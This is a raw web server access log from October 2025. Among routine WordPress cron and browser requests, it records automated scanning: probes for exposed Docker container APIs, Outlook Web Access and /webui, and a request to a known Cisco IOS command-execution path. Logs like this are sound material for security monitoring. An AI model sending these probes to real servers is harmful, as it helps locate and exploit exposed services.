101.36.107.228 - - [15/Oct/2025:05:21:41 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:43 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
123.57.13.121 - - [15/Oct/2025:05:27:43 +0800] "GET / HTTP/1.1" 200 39371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:05:30:34 +0800] "POST /wp-cron.php?doing_wp_cron=1760477434.6888868808746337890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
139.162.3.141 - - [15/Oct/2025:05:30:34 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
139.162.3.141 - - [15/Oct/2025:05:30:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML"
139.162.3.141 - - [15/Oct/2025:05:30:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML"
139.162.3.141 - - [15/Oct/2025:05:30:42 +0800] "GET /webui HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML"
139.162.3.141 - - [15/Oct/2025:05:30:43 +0800] "GET / HTTP/1.1" 200 165874 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML"
139.162.3.141 - - [15/Oct/2025:05:30:43 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML"
139.162.3.141 - - [15/Oct/2025:05:30:44 +0800] "GET / HTTP/1.1" 200 165874 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML"
139.162.3.141 - - [15/Oct/2025:05:30:45 +0800] "GET /owa/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML"
36.133.115.36 - - [15/Oct/2025:05:30:46 +0800] "POST /wp-cron.php?doing_wp_cron=1760477446.6400721073150634765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
139.162.3.141 - - [15/Oct/2025:05:30:46 +0800] "GET /owa/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML"
139.162.3.141 - - [15/Oct/2025:05:31:12 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
139.162.3.141 - - [15/Oct/2025:05:31:13 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [15/Oct/2025:05:32:52 +0800] "POST /wp-cron.php?doing_wp_cron=1760477572.5494449138641357421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.203.56.2 - - [15/Oct/2025:05:32:52 +0800] "GET / HTTP/1.1" 301 5 "-" "HTTP Banner Detection (https://security.ipip.net)"
194.50.16.36 - - [15/Oct/2025:05:33:25 +0800] "GET /level/15/exec/-/sh/run/CR HTTP/1.1" 301 5 "-" "libwww-perl/6.77"
194.50.16.36 - - [15/Oct/2025:05:33:26 +0800] "GET /level/15/exec/-/sh/run/CR HTTP/1.1" 404 31381 "-" "libwww-perl/6.77"
36.99.136.139 - - [15/Oct/2025:05:36:00 +0800] "GET /2163/ HTTP/1.1" 200 24072 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
